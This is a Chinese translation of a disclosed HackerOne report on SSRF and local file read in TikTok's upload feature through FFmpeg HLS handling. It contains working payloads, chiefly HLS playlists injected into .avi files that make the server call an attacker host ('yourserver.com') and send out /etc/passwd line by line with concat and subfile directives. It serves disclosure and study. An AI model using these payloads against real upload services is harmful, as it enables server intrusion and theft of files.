翻译|TikTok SSRF和LFR漏洞

44567

原文:https://hackerone.com/reports/1062888

FFmpeg是一个免费的开源软件项目，包含用于处理视频，音频和其他多媒体文件和流的大量库和程序。FFmpeg程序本身就是核心，它专门用于基于命令行的视频和音频文件处理。它被广泛用于格式转码，基本编辑（修剪和串联），视频缩放，视频后期制作效果和标准兼容性（SMPTE，ITU）。

FFmpeg包括libavcodec，许多商业和免费软件产品使用的音频/视频编解码器库，libavformat（Lavf），音频/视频容器多路复用器和demux库，以及用于对多媒体文件进行代码转换的ffmpeg核心命令行程序。

FFmpeg中的SSRF、LFR是众所周知的古老漏洞，但幸运的是我能够在https://www.tiktok.com/upload/功能上找到并利用它。

起初，我无法利用LFR，只能利用我的服务器监听SSRF。经过一番挖掘后，我发现问题出在我的文本编辑器在header.m3u8文件末尾添加了新行(\r\n)。

同样，此漏洞会导致DOS，但我决定不测试此问题。

SSRF:

对于SSRF，你只需要上传.avi带有注入的HLS指令的文件。

例子：

#EXTM3U

#EXT-X-MEDIA-SEQUENCE:0

#EXTINF:10.0,

http://yourserver.com/anything

#EXT-X-ENDLIST之后，将有一个对你服务器的请求。user-agent将获取Lavf（libavformat）版本。

LFR:

为了利用LFR，你需要在服务器上托管特殊文件，并在要上传的视频中引用它。

示例：header.m3u8你需要在服务器上托管的文件：

#EXTM3U

#EXT-X-MEDIA-SEQUENCE:0

#EXTINF:,http://yourserver.com?

确保header.m3u8在3fbyte（?符号）之后没有任何内容。你

可以用hexdump -C header.m3u8

video.avi

你需要在video.avi文件中注入以下命令：

#EXTM3U

#EXT-X-MEDIA-SEQUENCE:0

#EXTINF:10.0,

concat:http://yourserver.com/header.m3u8|file:///etc/passwd

#EXT-X-ENDLIST

上传完毕后video.avi，你将收到仅第一行的/etc/passwd文件。

但是我们还需要更多，对吗？

提取整个文件（任何文件）。我们可以使用两种技术。

使用header.y4m（你可以在引用的链接中找到它）： YUV4MPEG2 W30 H30 F25:1 Ip A0:0 Cmono FRAME

但是这种技术在这次渗透中没起作用。

截断文件技术:

为了逐行获取整个文件，你可以使用以下指令：

#EXTM3U#EXT-X-MEDIA-SEQUENCE:0

#EXTINF:10.0,

concat:http://yourserver.com/header.m3u8|subfile,,start,1,end,10000,,:/etc/passwd

#EXT-X-ENDLIST

start参数，其值为value（1）表示我们从文件的第一个符号开始，该end参数表示行的结尾。无需知道确切end值。获得第一行后，你可以轻松计算start第二行的值，依此类推。例如，对于第二行，我们的命令将类似于：concat:http://yourserver.com/header.m3u8|subfile,,start,70,end,10000,,:/etc/passwd